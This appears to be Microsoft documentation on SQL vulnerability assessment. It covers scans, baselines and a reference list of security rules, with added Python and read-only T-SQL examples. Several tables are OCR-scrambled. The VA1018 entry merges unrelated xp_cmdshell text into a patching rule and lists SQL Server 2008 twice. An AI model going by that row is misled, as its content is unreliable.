assessment on a logical server in West Europe, the results will be stored in West 
Europe. This data will be collected only if the SQL vulnerability assessment solution 
is configured on the logical server. 


On-demand vulnerability scans 
You can run SQL vulnerability assessment scans on-demand: 


1. From the resource's Defender for Cloud page, select View additional findings 
in Vulnerability Assessment to access the scan results from previous scans. 


[Screenshot: the Microsoft Defender for Cloud page for the SQL database DB1 (demosrv1/DB1). It shows Enablement Status: Enabled at the server-level (Configure); a Recommendations section (Transparent Data Encryption on SQL databases should be enabled, Low) with the link "View additional recommendations in Defender for Cloud"; a Security incidents and alerts section covering the past 21 days; and a Vulnerability assessment findings list (VA1219 Transparent data encryption should be enabled, applies to DB1, Medium) with the link "View additional findings in Vulnerability Assessment".]


2. To run an on-demand scan to scan your database for vulnerabilities, select 
Scan from the toolbar: 


[Screenshot: the Vulnerability Assessment pane for contosocrmdb (contocrmsrv/contosocrmdb), toolbar Scan | Open Query | Export Scan Results | Scan History | Refresh | Feedback, with the banner "SQL Vulnerability Assessment rules have been updated. This may impact your scan results." Summary: 3 total vulnerabilities (High 2, Low 1), last scan time 6/15/2023, 5:19:05 PM UTC, host resource contocrmsrv/contosocrmdb. Tabs: Findings | Passed | Not applicable; filter Benchmarks: All. Findings listed:

ID | Security check | Category | Benchmark | Severity
VA2108 | Minimal set of principals should be members of fixed high impact database roles | Authentication And Authorization | FedRAMP | High
VA1258 | Database owners are as expected | Auditing And Logging | FedRAMP | High
VA2130 | Track all users with access to the database | Authentication And Authorization | SOX | Low]


O Note 


The scan is lightweight and safe. It takes a few seconds to run and is entirely 
read-only. It doesn't make any changes to your database. 


Remediate vulnerabilities 


When a vulnerability scan completes, the report is displayed in the Azure portal. The report presents:

• An overview of your security state

• The number of issues that were found

• A summary by severity of the risks

• A list of the findings for further investigation


[Screenshot: the Vulnerability Assessment report for sqlserver1/database1, toolbar Scan | Export Scan Results | Scan History | Feedback. Total failing checks 3, total passing checks 31, risk summary High Risk 1 / Medium 1 / Low Risk 1, last scan time Wed, 10 Feb 2021 03:08:57 UTC. Tabs: Findings (3) | Passed (31). Findings listed:

ID | Security check | Applies to | Category | Risk | Additional info
VA2108 | Minimal set of principals should be members of fixed high impact database roles | database1 | Authentication & Authorization | High | Should set an initial baseline
VA1143 | 'dbo' user should not be used for normal service operation | database1 | Surface area reduction | Medium |
VA2130 | Track all users with access to the database | master | Authentication & Authorization | Low | Should set an initial baseline]


To remediate the vulnerabilities discovered: 


1. Review your results and determine which of the report's findings are true 
security issues for your environment. 


2. Select each failed result to understand its impact and why the security check failed.

Tip

The findings details page includes actionable remediation information explaining how to resolve the issue.


[Screenshot: the Vulnerability assessment findings list for contosocrmdb (VA2108 Minimal set of principals should be members of fixed high impact database roles, High; VA1258 Database owners are as expected, High; VA2130 Track all users with access to the database, Low), followed by the details page for VA2108 - Minimal set of principals should be members of fixed high impact database roles. Severity: High. Status: Unhealthy. Scan time: 6/15/2023. Benchmark: FedRAMP.

Description: SQL Server provides roles to help manage the permissions. Roles are security principals that group other principals. Database-level roles are database-wide in their permission scope. This rule checks that a minimal set of principals are members of the fixed database roles.

Impact: Fixed database roles may have administrative permissions on the system. Following the principle of least privilege, it is important to minimize membership in fixed database roles and keep a baseline of these memberships. See https://docs.microsoft.com/en-us/sql/relational-databases/security/authentication-access/database-level-roles for additional information on database roles.

Remediation: Remove members who should not have access to the database role:
ALTER ROLE [db_owner] DROP MEMBER [CRM_USER]
Exercise standard precautions when using the suggested remediation script on production environments.

Query and results (the right edge of the query is cut off in the screenshot):
SELECT user_name(sr.member_principal_id) AS [Principal]
  ,user_name(sr.role_principal_id) AS [Role]
  ,type_desc AS [Principal Type]
  ,authentication_type_desc AS [Authentication Type]
FROM sys.database_role_members AS sr
INNER JOIN sys.database_principals AS sp ON sp.principal_id =
WHERE sr.role_principal_id IN (
  user_id('bulkadmin'),
  user_id('db_accessadmin'),
  user_id('db_securityadmin'),
  user_id('db_ddladmin'),
  user_id('db_backupoperator'))

Buttons: Add all results as baseline | Remove all from baseline.]


3. As you review your assessment results, you can mark specific results as being 
an acceptable baseline in your environment. A baseline is essentially a 
customization of how the results are reported. In subsequent scans, results 
that match the baseline are considered as passes. After you've established 
your baseline security state, vulnerability assessment only reports on 
deviations from the baseline. In this way, you can focus your attention on the 
relevant issues. 


[Screenshot: the same VA2108 details page for contosocrmdb (contocrmsrv/contosocrmdb), Severity High, Status Unhealthy, Scan time 6/15/2023, Benchmark FedRAMP, with the check query shown in the Query and results pane and the buttons Add all results as baseline | Remove all from baseline. The result row returned by the query:

Status | Principal | Role | Principal Type
Not in Baseline | CRM_USER | db_owner | SQL_USER]


4. Any findings you've added to the baseline will now appear as Passed with an 
indication that they've passed because of the baseline changes. There's no 
need to run another scan for the baseline to take effect. 


[Screenshot: the Vulnerability Assessment pane for database1 (sqlserver1/database1), toolbar Scan | Open Query | Export Scan Results | Scan History | Refresh | Feedback, with the banner "SQL Vulnerability Assessment rules have been updated. This may impact your scan results." Summary: 0 total vulnerabilities (High 0, Medium 0, Low 0), last scan time 6/28/2023, 4:08:30 AM UTC, host resource sqlserver1/database1. The baselined finding now shows:

ID | Security check | Category | Benchmark | Status | Additional Info
VA2130 | Track all users with access to the database | Authentication And Authorization | SOX | Healthy | Pass Per Baseline]
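
To make the baseline behaviour of steps 3 and 4 concrete, here is an added Python example, not code from the Defender for Cloud documentation or the service, that applies a baseline to per-rule scan results the way the portal reports them: rows in the baseline report as "Pass Per Baseline", rows outside it stay "Not in Baseline", and a rule whose query returned no rows passes outright. The result rows are constructed from the VA2108 and VA2130 screenshots; the VA1020 entry, the row shape and the status wording beyond "Healthy"/"Unhealthy" are assumptions made for this example.

```python
"""
Added example: apply a vulnerability assessment baseline to per-rule results.

Not code from the Defender for Cloud docs or the service.  The result rows are
constructed from the VA2108/VA2130 screenshots above; the VA1020 entry, the
row shape (a dict of column name -> value) and the status wording beyond
"Healthy"/"Unhealthy" are assumptions made for this example.
"""

# Constructed scan results: rule id -> rows returned by that rule's query.
# An empty list means the query returned nothing, i.e. the check passed.
SCAN_RESULTS = {
    "VA2108": [  # Minimal set of principals should be members of fixed high impact database roles
        {"Principal": "CRM_USER", "Role": "db_owner", "Principal Type": "SQL_USER"},
    ],
    "VA2130": [  # Track all users with access to the database
        {"Principal": "CRM_USER"},
        {"Principal": "report_reader"},
    ],
    "VA1020": [],  # Database user GUEST should not be a member of any role
}


def row_key(row):
    """Canonical hashable form of a result row, so rows can be matched exactly."""
    return tuple(sorted(row.items()))


def add_to_baseline(baseline, rule_id, rows):
    """'Add all results as baseline' for one rule: record every returned row."""
    baseline.setdefault(rule_id, set()).update(row_key(r) for r in rows)
    return baseline


def remove_from_baseline(baseline, rule_id):
    """'Remove all from baseline' for one rule."""
    baseline.pop(rule_id, None)
    return baseline


def evaluate(results, baseline):
    """
    Apply the baseline to a scan.  Returns {rule_id: {"status", "reason",
    "not_in_baseline"}}.  A rule with no rows passes outright; a rule whose
    rows are all baselined passes "Per Baseline"; any row outside the
    baseline keeps the rule Unhealthy and is reported as the deviation.
    """
    report = {}
    for rule_id, rows in results.items():
        allowed = baseline.get(rule_id, set())
        deviations = [r for r in rows if row_key(r) not in allowed]
        if not rows:
            status, reason = "Healthy", "Pass"
        elif deviations:
            status, reason = "Unhealthy", "Not in Baseline"
        else:
            status, reason = "Healthy", "Pass Per Baseline"
        report[rule_id] = {"status": status, "reason": reason,
                           "not_in_baseline": deviations}
    return report


def summary(report):
    """Failing/passing counts, as shown in the report header."""
    failing = sum(1 for v in report.values() if v["status"] == "Unhealthy")
    return {"failing": failing, "passing": len(report) - failing}


if __name__ == "__main__":
    baseline = add_to_baseline({}, "VA2130", SCAN_RESULTS["VA2130"])
    report = evaluate(SCAN_RESULTS, baseline)
    for rule_id, entry in report.items():
        print(rule_id, entry["status"], entry["reason"], entry["not_in_baseline"])
    print(summary(report))
```

The matching is exact per row, so a later scan that returns one extra principal for VA2130 flags only that principal, which is the "deviations from the baseline" behaviour the step describes. The flip side is that a baselined row stays silent for as long as it is in the baseline, so the CRM_USER in db_owner case above should be remediated, not baselined.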


Your vulnerability assessment scans can now be used to ensure that your database 
maintains a high level of security, and that your organizational policies are met. 


Next steps 


e Learn more about Microsoft Defender for Azure SQL. 

e Learn more about data discovery and classification. 

e Learn more about storing vulnerability assessment scan results in a storage 
account accessible behind firewalls and VNets. 


SQL vulnerability assessment rules reference guide

Article • 12/29/2022

This article lists the set of built-in rules that are used to flag security vulnerabilities and highlight deviations from best practices, such as misconfigurations and excessive permissions. The rules are based on Microsoft's best practices and focus on the security issues that present the biggest risks to your database and its valuable data. They cover both database-level issues as well as server-level security issues, like server firewall settings and server-level permissions. These rules also represent many of the requirements from various regulatory bodies to meet their compliance standards.

Applies to: Azure SQL Database, Azure SQL Managed Instance, Azure Synapse Analytics, SQL Server (all supported versions)

The rules shown in your database scans depend on the SQL version and platform that was scanned.

To learn about how to implement vulnerability assessment in Azure, see Implement vulnerability assessment.

For a list of changes to these rules, see SQL vulnerability assessment rules changelog.

Rule categories

SQL vulnerability assessment rules have five categories, which are in the following sections:

• Authentication and Authorization
• Auditing and Logging
• Data Protection
• Installation Updates and Patches
• Surface Area Reduction

¹ SQL Server 2012+ refers to all versions of SQL Server 2012 and above.
² SQL Server 2017+ refers to all versions of SQL Server 2017 and above.
³ SQL Server 2016+ refers to all versions of SQL Server 2016 and above.


Authentication and Authorization 


Rule ID 


VA1017 


VA1020 


VA1042 


VA1043 


VA1046 


Rule Title Rule 


Severity 


Execute permissions on High 
xp_cmdshell from all 
users (except dbo) 


should be revoked 


Database user GUEST 
should not be a 


High 


member of any role 


Database ownership High 
chaining should be 

disabled for all 

databases except for 

master, msdb, and 


tempdb 


Principal GUEST should 
not have access to any 
user database 


CHECK_POLICY should Low 
be enabled for all SQL 
logins 


Medium 


Rule Description 


The xp_cmdshell extended stored 
procedure spawns a Windows 
command shell, passing in a string for 
execution. This rule checks that no 
users (other than users with the 
CONTROL SERVER permission like 
members of the sysadmin server role) 
have permission to execute the 
xp_cmdshell extended stored 
procedure. 


The guest user permits access to a 
database for any logins that are not 
mapped to a specific database user. 
This rule checks that no database 
roles are assigned to the Guest user. 


Cross database ownership chaining is 
an extension of ownership chaining, 
except it does cross the database 
boundary. This rule checks that this 
option is disabled for all databases 
except for master, msdb, and tempdb . 
For master, msdb, and tempdb, cross 
database ownership chaining is 
enabled by default. 


The guest user permits access to a 
database for any logins that are not 
mapped to a specific database user. 
This rule checks that the guest user 
cannot connect to any database. 


CHECK_POLICY option enables 
verifying SQL logins against the 
domain policy. This rule checks that 
CHECK_POLICY option is enabled for 
all SQL logins. 


Platform 


SQL 
Server 
2012+! 


SQL 
Server 
2012+ 


SQL 
Database 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


Rule ID 


VA1047 


VA1048 


VA1052 


VA1053 


VA1054 


Rule Title 


Password expiration 
check should be 
enabled for all SQL 
logins 


Database principals 
should not be mapped 
to the sa account 


Remove 
BUILTIN\Administrators 
as a server login 


Account with default 
name sa should be 
renamed or disabled 


Excessive permissions 
should not be granted 
to PUBLIC role on 
objects or columns 


Rule 
Severity 


Low 


High 


Low 


Low 


Low 


Rule Description 


Password expiration policies are used 
to manage the lifespan of a password. 
When SQL Server enforces password 
expiration policy, users are reminded 
to change old passwords, and 
accounts that have expired passwords 
are disabled. This rule checks that 
password expiration policy is enabled 
for all SQL logins. 


A database principal that is mapped 
to the sa account can be exploited by 
an attacker to elevate permissions to 


sysadmin 


The BUILTIN\Administrators group 
contains the Windows Local 
Administrators group. In older 
versions of Microsoft SQL Server this 
group has administrator rights by 
default. This rule checks that this 
group is removed from SQL Server. 


sa is a well-known account with 
principal ID 1. This rule verifies that 
the sa account is either renamed or 
disabled. 


Every SQL Server login belongs to the 
public server role. When a server 
principal has not been granted or 
denied specific permissions on a 
securable object the user inherits the 
permissions granted to public on that 
object. This rule displays a list of all 
securable objects or columns that are 
accessible to all users through the 
PUBLIC role. 


Platform 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Database 


Rule ID 


VA1058 


VA1059 


VA1067 


VA1068 


VA1070 


Rule Title Rule 

Severity 
sa login should be High 
disabled 


xp_cmdshell should be High 
disabled 


Database Mail XPs Medium 
should be disabled 
when it is not in use 


Server permissions Low 
shouldn't be granted 
directly to principals 


Database users Low 
shouldn't share the 

same name as a server 

login 


Rule Description 


sa is a well-known account with 
principal ID 1. This rule verifies that 
the sa account is disabled. 


xp_cmdshell spawns a Windows 
command shell and passes it a string 
for execution. This rule checks that 
xp_cmdshell is disabled. 


This rule checks that Database Mail is 
disabled when no database mail 
profile is configured. Database Mail 
can be used for sending e-mail 
messages from the SQL Server 
Database Engine and is disabled by 
default. If you are not using this 
feature, it is recommended to disable 
it to reduce the surface area. 


Server level permissions are 
associated with a server level object 
to regulate which users can gain 
access to the object. This rule checks 
that there are no server level 


permissions granted directly to logins. 


Database users may share the same 
name as a server login. This rule 
validates that there are no such users. 


Platform 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


Rule ID 


VA1072 


VA1094 


VA1095 


VA1096 


Rule Title Rule 
Severity 
Authentication mode Medium 


should be Windows 
Authentication 


Database permissions Low 
shouldn't be granted 
directly to principals 


Excessive permissions Medium 
should not be granted 
to PUBLIC role 


Principal GUEST should Low 
not be granted 

permissions in the 

database 


Rule Description 


There are two possible authentication 
modes: Windows Authentication 
mode and mixed mode. Mixed mode 
means that SQL Server enables both 
Windows authentication and SQL 
Server authentication. This rule checks 
that the authentication mode is set to 
Windows Authentication. 


Permissions are rules associated with 
a securable object to regulate which 
users can gain access to the object. 
This rule checks that there are no DB 
permissions granted directly to users. 


Every SQL Server login belongs to the 
public server role. When a server 
principal has not been granted or 
denied specific permissions on a 
securable object the user inherits the 
permissions granted to public on that 
object. This displays a list of all 
permissions that are granted to the 
PUBLIC role. 


Each database includes a user called 
GUEST. Permissions granted to GUEST 
are inherited by users who have 
access to the database but who do 
not have a user account in the 
database. This rule checks that all 
permissions have been revoked from 
the GUEST user. 


Platform 


SQL 
Server 
2012+ 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Rule ID Rule Title 


VA1097 Principal GUEST should 
not be granted 
permissions on objects 
or columns 


VA1099 GUEST user should not 
be granted permissions 
on database securables 


VA1246 Application roles 
should not be used 


Rule 
Severity 


Low 


Low 


Low 


Rule Description 


Each database includes a user called 
GUEST. Permissions granted to GUEST 
are inherited by users who have 
access to the database but who do 
not have a user account in the 
database. This rule checks that all 
permissions have been revoked from 
the GUEST user. 


Each database includes a user called 
GUEST. Permissions granted to GUEST 
are inherited by users who have 
access to the database but who do 
not have a user account in the 
database. This rule checks that all 
permissions have been revoked from 
the GUEST user. 


An application role is a database 
principal that enables an application 
to run with its own user-like 
permissions. Application roles enable 
that only users connecting through a 
particular application can access 
specific data. Application roles are 
password-based (which applications 
typically hardcode) and not 
permission based which exposes the 
database to app role impersonation 
by password-guessing. This rule 
checks that no application roles are 
defined in the database. 


Platform 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Rule ID Rule Title Rule 
Severity 


VA1248 User-defined database Medium 
roles should not be 
members of fixed roles 


VA1267 Contained users should Medium 
use Windows 
Authentication 


VA1280 Server Permissions Medium 
granted to public 
should be minimized 


VA1282 Orphan roles should be Low 
removed 


Rule Description 


To easily manage the permissions in 
your databases SQL Server provides 
several roles, which are security 
principals that group other principals. 
They are like groups in the Microsoft 
Windows operating system. Database 
accounts and other SQL Server roles 
can be added into database-level 
roles. Each member of a fixed- 
database role can add other users to 
that same role. This rule checks that 
no user-defined roles are members of 
fixed roles. 


Contained users are users that exist 
within the database and do not 
require a login mapping. This rule 
checks that contained users use 
Windows Authentication. 


Every SQL Server login belongs to the 
public server role. When a server 
principal has not been granted or 
denied specific permissions ona 
securable object the user inherits the 
permissions granted to public on that 
object. This rule checks that server 
permissions granted to public are 
minimized. 


Orphan roles are user-defined roles 
that have no members. Eliminate 
orphaned roles as they are not 
needed on the system. This rule 
checks whether there are any orphan 
roles. 


Platform 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Azure 
Synapse 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Azure 
Synapse 


Rule ID Rule Title Rule 
Severity 
VA2020 Minimal set of High 


VA2033 


VA2103 


principals should be 
granted ALTER or 
ALTER ANY USER 
database-scoped 
permissions 


Minimal set of Low 
principals should be 

granted database- 

scoped EXECUTE 

permission on objects 

or columns 


Unnecessary execute Medium 
permissions on 

extended stored 

procedures should be 

revoked 


Rule Description 


Every SQL Server securable has 
permissions associated with it that 
can be granted to principals. 
Permissions can be scoped at the 
server level (assigned to logins and 
server roles) or at the database level 
(assigned to database users and 
database roles). These rules check 
that only a minimal set of principals 
are granted ALTER or ALTER ANY 
USER database-scoped permissions. 


This rule checks which principals are 
granted EXECUTE permission on 
objects or columns to ensure this 
permission is granted to a minimal set 
of principals. Every SQL Server 
securable has permissions associated 
with it that can be granted to 
principals. Permissions can be scoped 
at the server level (assigned to logins 
and server roles) or at the database 
level (assigned to database users, 
database roles, or application roles). 
The EXECUTE permission applies to 
both stored procedures and scalar 
functions, which can be used in 
computed columns. 


Extended stored procedures are DLLs 
that an instance of SQL Server can 
dynamically load and run. SQL Server 
is packaged with many extended 
stored procedures that allow for 
interaction with the system DLLs. This 
rule checks that unnecessary execute 
permissions on extended stored 
procedures have been revoked. 


Platform 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Azure 
Synapse 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Azure 
Synapse 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


Rule ID Rule Title 


VA2107 


VA2108 


VA2109 


Minimal set of 
principals should be 
members of fixed 
Azure SQL DB master 
database roles 


Minimal set of 
principals should be 
members of fixed high 
impact database roles 


Minimal set of 
principals should be 
members of fixed low 
impact database roles 


Rule 
Severity 


High 


High 


Low 


Rule Description 


SQL Database provides two restricted 
administrative roles in the master 
database to which user accounts can 
be added that grant permissions to 
either create databases or manage 
logins. This rule check that a minimal 
set of principals are members of these 
administrative roles. 


SQL Server provides roles to help 
manage the permissions. Roles are 
security principals that group other 
principals. Database-level roles are 
database-wide in their permission 
scope. This rule checks that a minimal 
set of principals are members of the 
fixed database roles. 


SQL Server provides roles to help 
manage the permissions. Roles are 
security principals that group other 
principals. Database-level roles are 
database-wide in their permission 
scope. This rule checks that a minimal 
set of principals are members of the 
fixed database roles. 


Platform 


SQL 
Database 


Azure 
Synapse 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Azure 
Synapse 


SQL 
Server 
2012+ 


SQL 
Managed 
Instance 


SQL 
Database 


Azure 
Synapse 


Rule ID | Rule Title | Rule Severity | Rule Description | Platform
VA2110 | Execute permissions to access the registry should be revoked | High | Registry extended stored procedures allow Microsoft SQL Server to read, write, and enumerate values and keys in the registry. They are used by Enterprise Manager to configure the server. This rule checks that the permissions to execute registry extended stored procedures have been revoked from all users (other than dbo). | SQL Server 2012+, SQL Managed Instance
VA2113 | Data Transformation Services (DTS) permissions should only be granted to SSIS roles | Medium | Data Transformation Services (DTS) is a set of objects and utilities that allow the automation of extract, transform, and load operations to or from a database. The objects are DTS packages and their components, and the utilities are called DTS tools. This rule checks that only the SSIS roles are granted permissions to use the DTS system stored procedures, and that the permissions for the PUBLIC role to use the DTS system stored procedures have been revoked. | SQL Server 2012+, SQL Managed Instance
VA2114 | Minimal set of principals should be members of high impact fixed server roles | High | SQL Server provides roles to help manage permissions. Roles are security principals that group other principals. Server-level roles are server-wide in their permission scope. This rule checks that a minimal set of principals are members of the fixed server roles. | SQL Server 2012+, SQL Managed Instance
VA2129 | Changes to signed modules should be authorized | High | You can sign a stored procedure, function, or trigger with a certificate or an asymmetric key. This is designed for scenarios when permissions cannot be inherited through ownership chaining or when the ownership chain is broken, such as dynamic SQL. This rule checks for changes made to signed modules, which could be an indication of malicious use. | SQL Server 2012+, SQL Database, SQL Managed Instance
Rule ID | Rule Title | Rule Severity | Rule Description | Platform
VA2130 | Track all users with access to the database | Low | This check tracks all users with access to a database. Make sure that these users are authorized according to their current role in the organization. | SQL Database, Azure Synapse
VA2201 | SQL logins with commonly used names should be disabled | High | This rule checks the accounts with database owner permission for commonly used names. Assigning commonly used names to accounts with database owner permission increases the likelihood of successful brute force attacks. | SQL Server 2012+
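The three queries below are an added example, not code from the Microsoft page or from the vulnerability assessment service itself. They show how a DBA can inspect, in T-SQL, the state that VA2114, VA2110 and VA2130 evaluate before or after a scan. Which fixed server roles count as "high impact" is not stated on the page, so the role list in the first query is an assumption, as is the name pattern used to pick out the registry extended stored procedures.

```sql
-- Added example (not from the Microsoft page). Run as a login that holds
-- VIEW ANY DEFINITION on the instance; the third query runs in the database
-- being assessed.

-- VA2114: who sits in the fixed server roles. The role list is an assumption;
-- the page does not say which roles the rule treats as high impact.
SELECT r.name AS role_name,
       m.name AS member_name,
       m.type_desc,
       m.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals   AS m ON m.principal_id = rm.member_principal_id
WHERE r.is_fixed_role = 1
  AND r.name IN ('sysadmin', 'securityadmin', 'serveradmin', 'setupadmin')
ORDER BY r.name, m.name;

-- VA2110: EXECUTE grants on the registry extended stored procedures in master
-- (xp_regread, xp_regwrite, xp_instance_regread, ...). After remediation only
-- dbo should remain, which is the exception the rule text makes.
SELECT o.name  AS xp_name,
       gp.name AS grantee,
       p.state_desc,
       p.permission_name
FROM master.sys.database_permissions AS p
JOIN master.sys.all_objects         AS o  ON o.object_id = p.major_id AND p.class = 1
JOIN master.sys.database_principals AS gp ON gp.principal_id = p.grantee_principal_id
WHERE o.type = 'X'                  -- extended stored procedure
  AND o.name LIKE 'xp[_]%reg%'      -- name pattern is an assumption, widen if needed
  AND p.permission_name = 'EXECUTE'
  AND p.state_desc = 'GRANT'
ORDER BY o.name, gp.name;

-- VA2130: every principal that can use the current database, with the login
-- it maps to, so the list can be reviewed against people's current roles.
SELECT dp.name AS database_user,
       dp.type_desc,
       dp.authentication_type_desc,
       sp.name AS mapped_login,
       dp.create_date,
       dp.modify_date
FROM sys.database_principals AS dp
LEFT JOIN sys.server_principals AS sp ON sp.sid = dp.sid
WHERE dp.type IN ('S', 'U', 'G', 'E', 'X')   -- SQL user, Windows user/group, external user/group
  AND dp.name NOT IN ('dbo', 'guest', 'sys', 'INFORMATION_SCHEMA')
ORDER BY dp.name;
```

The first two queries read instance-wide catalog views and can be scheduled as a baseline job; diffing their output against a stored copy is the simplest way to turn VA2114 and VA2110 from a point-in-time scan into an ongoing control.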
Auditing and Logging

Rule ID | Rule Title | Rule Severity | Rule Description | Platform
VA1045 | Default trace should be enabled | Medium | Default trace provides troubleshooting assistance to database administrators by ensuring that they have the log data necessary to diagnose problems the first time they occur. This rule checks that the default trace is enabled. | SQL Server 2012+, SQL Managed Instance
VA1091 | Auditing of both successful and failed login attempts (default trace) should be enabled when 'Login auditing' is set up to track logins | Low | SQL Server Login auditing configuration enables administrators to track the users logging into SQL Server instances. If the user chooses to count on 'Login auditing' to track users logging into SQL Server instances, then it is important to enable it for both successful and failed login attempts. | SQL Server 2012+
VA1093 | Maximum number of error logs should be 12 or more | Low | Each SQL Server Error log will have all the information related to failures / errors that have occurred since SQL Server was last restarted or since the last time you have recycled the error logs. This rule checks that the maximum number of error logs is 12 or more. | SQL Server 2012+


Rule ID | Rule Title | Rule Severity | Rule Description | Platform
VA1258 | Database owners are as expected | High | Database owners can perform all configuration and maintenance activities on the database and can also drop databases in SQL Server. Tracking database owners is important to avoid having excessive permission for some principals. Create a baseline that defines the expected database owners for the database. This rule checks whether the database owners are as defined in the baseline. | SQL Server 2016+ (footnote 3), SQL Database, Azure Synapse
VA1264 | Auditing of both successful and failed login attempts should be enabled | Low | SQL Server auditing configuration enables administrators to track the users logging into SQL Server instances that they're responsible for. This rule checks that auditing is enabled for both successful and failed login attempts. | SQL Server 2012+, SQL Managed Instance
VA1265 | Auditing of both successful and failed login attempts for contained DB authentication should be enabled | Medium | SQL Server auditing configuration enables administrators to track users logging into SQL Server instances that they're responsible for. This rule checks that auditing is enabled for both successful and failed login attempts for contained DB authentication. | SQL Server 2012+, SQL Managed Instance
VA1281 | All memberships for user-defined roles should be intended | Medium | User-defined roles are security principals defined by the user to group principals to easily manage permissions. Monitoring these roles is important to avoid having excessive permissions. Create a baseline that defines expected membership for each user-defined role. This rule checks whether all memberships for user-defined roles are as defined in the baseline. | SQL Server 2012+, SQL Managed Instance, SQL Database, Azure Synapse

Rule ID | Rule Title | Rule Severity | Rule Description | Platform
VA1283 | There should be at least 1 active audit in the system | Low | Auditing an instance of the SQL Server Database Engine or an individual database involves tracking and logging events that occur on the Database Engine. The SQL Server Audit object collects a single instance of server or database-level actions and groups of actions to monitor. This rule checks that there is at least one active audit in the system. | SQL Server 2012+, SQL Managed Instance
VA2061 | Auditing should be enabled at the server level | High | Azure SQL Database Auditing tracks database events and writes them to an audit log in your Azure storage account. Auditing helps you understand database activity, gain insight into discrepancies and anomalies that could indicate business concerns or suspected security violations, and meet regulatory compliance. For more information, see Azure SQL Auditing. This rule checks that auditing is enabled. | SQL Database, Azure Synapse

Data Protection

Rule ID | Rule Title | Rule Severity | Rule Description | Platform
VA1098 | Any Existing SSB or Mirroring endpoint should require AES connection | High | Service Broker and Mirroring endpoints support different encryption algorithms, including no encryption. This rule checks that any existing endpoint requires AES encryption. | SQL Server 2012+


Rule ID | Rule Title | Rule Severity | Rule Description | Platform
VA1219 | Transparent data encryption should be enabled | Medium | Transparent data encryption (TDE) helps to protect the database files against information disclosure by performing real-time encryption and decryption of the database, associated backups, and transaction log files 'at rest', without requiring changes to the application. This rule checks that TDE is enabled on the database. | SQL Server 2012+, SQL Managed Instance, SQL Database, Azure Synapse
VA1220 | Database communication using TDS should be protected through TLS | High | Microsoft SQL Server can use Secure Sockets Layer (SSL) or Transport Layer Security (TLS) to encrypt data that is transmitted across a network between an instance of SQL Server and a client application. This rule checks that all connections to the SQL Server are encrypted through TLS. | SQL Server 2012+, SQL Managed Instance
VA1221 | Database Encryption Symmetric Keys should use AES algorithm | High | SQL Server uses encryption keys to help secure data, credentials, and connection information that is stored in a server database. SQL Server has two kinds of keys: symmetric and asymmetric. This rule checks that Database Encryption Symmetric Keys use the AES algorithm. | SQL Server 2012+, SQL Managed Instance, SQL Database, Azure Synapse
VA1222 | Cell-Level Encryption keys should use AES algorithm | High | Cell-Level Encryption (CLE) allows you to encrypt your data using symmetric and asymmetric keys. This rule checks that Cell-Level Encryption symmetric keys use the AES algorithm. | SQL Server 2012+, SQL Managed Instance

Rule ID | Rule Title | Rule Severity | Rule Description | Platform
VA1223 | Certificate keys should use at least 2048 bits | High | Certificate keys are used in RSA and other encryption algorithms to protect data. These keys need to be of enough length to secure the user's data. This rule checks that the key's length is at least 2048 bits for all certificates. | SQL Server 2012+, SQL Managed Instance, SQL Database, Azure Synapse
VA1224 | Asymmetric keys' length should be at least 2048 bits | High | Database asymmetric keys are used in many encryption algorithms; these keys need to be of enough length to secure the encrypted data. This rule checks that all asymmetric keys stored in the database have a length of at least 2048 bits. | SQL Server 2012, SQL Server 2014, SQL Database
VA1279 | Force encryption should be enabled for TDS | High | When the Force Encryption option for the Database Engine is enabled, all communication between client and server is encrypted regardless of whether the 'Encrypt connection' option (such as from SSMS) is checked or not. This rule checks that the Force Encryption option is enabled. | SQL Server 2012+, SQL Managed Instance
VA2060 | SQL Threat Detection should be enabled at the server level | Medium | SQL Threat Detection provides a layer of security that detects potential vulnerabilities and anomalous activity in databases, such as SQL injection attacks and unusual behavior patterns. When a potential threat is detected, Threat Detection sends an actionable real-time alert by email and in Microsoft Defender for Cloud, which includes clear investigation and remediation steps for the specific threat. For more information, see Configure threat detection. This check verifies that SQL Threat Detection is enabled. | SQL Database, Azure Synapse

Installation Updates and Patches

Rule ID | Rule Title | Rule Severity | Rule Description | Platform
VA1018 | Latest updates should be installed | High | Microsoft periodically releases Cumulative Updates (CUs) for each version of SQL Server. This rule checks whether the latest CU has been installed for the particular version of SQL Server being used, by passing in a string for execution. This rule checks that all users (except dbo) do not have permission to execute the xp_cmdshell extended stored procedure. | SQL Server 2005, SQL Server 2008, SQL Server 2008, SQL Server 2012, SQL Server 2014, SQL Server 2016, SQL Server 2017
VA2128 | Vulnerability assessment is not supported for SQL Server versions lower than SQL Server 2012 | High | To run a vulnerability assessment scan on your SQL Server, the server needs to be upgraded to SQL Server 2012 or higher; SQL Server 2008 R2 and below are no longer supported by Microsoft. For more information, see | SQL Server 2012+, SQL Managed Instance, SQL Database, Azure Synapse

